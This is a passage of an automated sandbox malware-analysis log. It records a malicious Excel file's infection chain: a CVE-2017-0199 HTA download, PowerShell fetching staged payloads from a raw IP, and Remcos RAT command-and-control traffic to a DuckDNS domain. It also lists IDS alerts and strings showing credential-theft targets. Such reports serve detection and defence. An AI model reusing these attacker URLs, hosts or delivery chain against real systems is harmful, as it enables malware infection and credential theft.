                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 38.240.44.9:80
                    Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 38.240.44.9:80 -> 192.168.2.22:49162
                    Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49171 -> 38.240.44.9:80
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49173 -> 192.3.101.184:9674
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49174 -> 192.3.101.184:9674
                    Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 38.240.44.9:80 -> 192.168.2.22:49177
                    Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 38.240.44.9:80 -> 192.168.2.22:49177
                    Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.227.242:443 -> 192.168.2.22:49166
                    Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.227.242:443 -> 192.168.2.22:49176
                    Source: Malware configuration extractorURLs: ugnrv.duckdns.org
                    Source: unknownDNS query: name: ugnrv.duckdns.org
                    Source: global trafficHTTP traffic detected: GET /32/items/detah-note-v_202410/DetahNote_V.jpg HTTP/1.1Host: ia600102.us.archive.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /32/items/detah-note-v_202410/DetahNote_V.jpg HTTP/1.1Host: ia600102.us.archive.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /590/RRSRRD.txt HTTP/1.1Host: 38.240.44.9Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /590/RRSRRD.txt HTTP/1.1Host: 38.240.44.9Connection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                    Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                    Source: Joe Sandbox ViewASN Name: INTERNET-ARCHIVEUS INTERNET-ARCHIVEUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49175 -> 178.237.33.50:80
                    Source: global trafficHTTP traffic detected: GET /DeSHzc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wrath.meConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /DeSHzc HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wrath.meConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /DeSHzc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wrath.meConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /DeSHzc HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wrath.meConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /590/un/verynicepersonupdation.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 38.240.44.9Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /590/un/verynicepersonupdation.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=6756-Connection: Keep-AliveHost: 38.240.44.9If-Range: "1d7be-623f2d847e3f2"
                    Source: global trafficHTTP traffic detected: GET /590/nicefeaturesworkinggreat.Tif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 38.240.44.9Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /590/un/verynicepersonupdation.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Tue, 08 Oct 2024 08:22:57 GMTConnection: Keep-AliveHost: 38.240.44.9If-None-Match: "1d7be-623f2d847e3f2"
                    Source: unknownHTTPS traffic detected: 207.241.227.242:443 -> 192.168.2.22:49166 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 207.241.227.242:443 -> 192.168.2.22:49176 version: TLS 1.0
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE89977018 URLDownloadToFileW,7_2_000007FE89977018
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\29FB170A.emfJump to behavior
                    Source: global trafficHTTP traffic detected: GET /DeSHzc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wrath.meConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /DeSHzc HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wrath.meConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /32/items/detah-note-v_202410/DetahNote_V.jpg HTTP/1.1Host: ia600102.us.archive.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /DeSHzc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wrath.meConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /DeSHzc HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wrath.meConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /32/items/detah-note-v_202410/DetahNote_V.jpg HTTP/1.1Host: ia600102.us.archive.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /590/un/verynicepersonupdation.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 38.240.44.9Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /590/un/verynicepersonupdation.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=6756-Connection: Keep-AliveHost: 38.240.44.9If-Range: "1d7be-623f2d847e3f2"
                    Source: global trafficHTTP traffic detected: GET /590/nicefeaturesworkinggreat.Tif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 38.240.44.9Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /590/un/verynicepersonupdation.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Tue, 08 Oct 2024 08:22:57 GMTConnection: Keep-AliveHost: 38.240.44.9If-None-Match: "1d7be-623f2d847e3f2"
                    Source: global trafficHTTP traffic detected: GET /590/RRSRRD.txt HTTP/1.1Host: 38.240.44.9Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /590/RRSRRD.txt HTTP/1.1Host: 38.240.44.9Connection: Keep-Alive
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                    Source: RegAsm.exe, 0000001D.00000002.508964353.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                    Source: RegAsm.exe, RegAsm.exe, 0000001D.00000002.508964353.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                    Source: RegAsm.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                    Source: mshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                    Source: RegAsm.exe, 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                    Source: RegAsm.exe, 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                    Source: global trafficDNS traffic detected: DNS query: wrath.me
                    Source: global trafficDNS traffic detected: DNS query: ia600102.us.archive.org
                    Source: global trafficDNS traffic detected: DNS query: ugnrv.duckdns.org
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: powershell.exe, 0000000E.00000002.494455760.0000000002788000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.528837930.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.240.44.9
                    Source: mshta.exe, 00000004.00000003.448430988.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447903392.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://38.240.44.9/
                    Source: mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://38.240.44.9/#
                    Source: powershell.exe, 0000000E.00000002.494455760.0000000002788000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.528837930.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.240.44.9/590/RRSRRD.txt
                    Source: powershell.exe, 00000007.00000002.470636519.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.502469699.00000000024F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.240.44.9/590/nicefeatu
                    Source: powershell.exe, 00000013.00000002.502469699.00000000024F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.240.44.9/590/nicefeaturesworkinggreat.Tif
                    Source: powershell.exe, 00000013.00000002.514899647.000000001A5DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://38.240.44.9/590/nicefeaturesworkinggreat.TifC:
                    Source: powershell.exe, 00000013.00000002.514899647.000000001A5DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://38.240.44.9/590/nicefeaturesworkinggreat.TifI
                    Source: powershell.exe, 00000007.00000002.470636519.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.502469699.00000000024F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.240.44.9/590/nicefeaturesworkinggreat.Tifp
                    Source: mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://38.240.44.9/590/un/verynicepersonupdation.hta
                    Source: mshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://38.240.44.9/590/un/verynicepersonupdation.hta4
                    Source: mshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://38.240.44.9/590/un/verynicepersonupdation.hta?
                    Source: mshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://38.240.44.9/590/un/verynicepersonupdation.htaF
                    Source: mshta.exe, 00000004.00000002.448553734.000000000039A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://38.240.44.9/590/un/verynicepersonupdation.htaJ
                    Source: mshta.exe, 0000000F.00000002.493635513.0000000003794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://38.240.44.9/590/un/verynicepersonupdation.htaQ
                    Source: mshta.exe, 00000004.00000003.448430988.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447903392.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.000000000364E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://38.240.44.9/590/un/verynicepersonupdation.htab
                    Source: mshta.exe, 00000004.00000003.448430988.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447903392.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.000000000364E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://38.240.44.9/590/un/verynicepersonupdation.htag
                    Source: mshta.exe, 00000004.00000003.448326781.0000000003005000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487911172.0000000002C85000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.490123210.0000000002C85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.240.44.9/590/un/verynicepersonupdation.htahttp://38.240.44.9/590/un/verynicepersonupdation
                    Source: mshta.exe, 0000000F.00000002.493427429.0000000000250000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492748708.000000000024F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://38.240.44.9/590/un/verynicepersonupdation.htaw
                    Source: mshta.exe, 0000000F.00000002.493427429.0000000000250000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492748708.000000000024F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://38.240.44.9/590/un/verynicepersonupdation.htaz
                    Source: mshta.exe, 00000004.00000003.448430988.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447903392.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.000000000364E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://38.240.44.9/a
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://b.scorecardresearch.com/beacon.js
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
                    Source: mshta.exe, 00000004.00000003.448430988.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447903392.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.000000000364E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.481362851.000000001C25C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C1BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487893525.00000000037E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C18D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: mshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.481362851.000000001C25C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.481362851.000000001C1F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C180000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C1B2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.530346179.000000001AAEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, 